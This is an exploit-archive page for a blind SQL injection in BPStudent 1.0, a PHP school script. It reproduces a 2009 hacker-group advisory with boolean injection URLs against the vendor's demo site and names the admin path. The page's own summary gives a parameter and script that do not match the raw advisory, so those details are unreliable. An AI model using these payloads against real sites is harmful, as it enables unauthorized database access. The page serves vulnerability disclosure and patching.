BPStudent 1.0 blind SQL Vulnerabilities

vendor:

BPStudent

by:

OoN_Boy

8.8

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: BPStudent

Affected Version From: 1

Affected Version To: 1

Patch Exists: YES

Related CWE: CVE-2009-4010

CPE: cpe:a:bpowerhouse:bpstudent:1.0

Metasploit: https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2009-4010/, https://www.rapid7.com/db/vulnerabilities/suse-cve-2009-4010/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2009

BPStudent 1.0 blind SQL Vulnerabilities

BPStudent 1.0 is vulnerable to Blind SQL Injection. This vulnerability allows an attacker to execute arbitrary SQL queries on the vulnerable application. This can be exploited to gain access to the database and the underlying system. The vulnerability is located in the 'id' parameter of the 'index.php' script. An attacker can inject arbitrary SQL code in the 'id' parameter value to execute arbitrary SQL queries.

Mitigation:

The best way to mitigate this vulnerability is to use parameterized queries.

Source

Exploit-DB raw data:

[x]========================================================================================================================================[x]
 |                                                      AntiSecurity[dot]org                                                                |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Title    		: BPStudent 1.0 blind SQL Vulnerabilities									    |
 | Software 		: BPStudent													    |
 | Vendor   		: http://bpowerhouse.info											    |
 | Date    		: 22 September 2009 ( Indonesia )										    |
 | Author   		: OoN_Boy													    |
 | Contact  		: oon.boy9@gmail.com												    |
 | Web	    		: http://oonboy.info												    |
 | Blog     		: http://oonboy.blogspot.com											    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Technology		: PHP5                                                                                                              |
 | Database		: MySQL                                                                                                             |
 | Version		: 1.0                                                                                                               |
 | License		: GNU GPL                                                                                                           |
 | Price		: $27.90                                                                                                            |
 | Description		: This script is a  on site school script, students can register, download study material and take exams- system    |
 |			  will mark the exams and student can graduate courses, administrator can create exams, manage students and courses |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Google Dork 		: cari sendiri yah :)												    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Exploit 		: http://localhost/[path]/students.php?page=preview&test=[sql]			 	 			    |
 | Aadmin Page		: http://localhost/[path]/admin/index.php									    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Proof of concept	: http://bpowerhouse.com/demos/bpstudentsDemo/students.php?page=preview&test=1+and+substring(@@version,1,1)=5 True  |
 |			  http://bpowerhouse.com/demos/bpstudentsDemo/students.php?page=preview&test=1+and+substring(@@version,1,1)=4 False |
 | 			: Mesti login untuk mencoba exploitnya :)									    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Greetz		: antisecurity.org batamhacker.or.id                                                                                |
 |		 	  Vrs-hCk NoGe Paman zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va                       |
 | 		  	  k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere                  |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Note			: Selamat hariraya idul fitri mohon maaf lahir dan batin, maafin kesalahan ku selama ini yah all :)		    |
 |			  kabur.... untuk sementara waktu.... bye bye.....								    |
[x]========================================================================================================================================[x]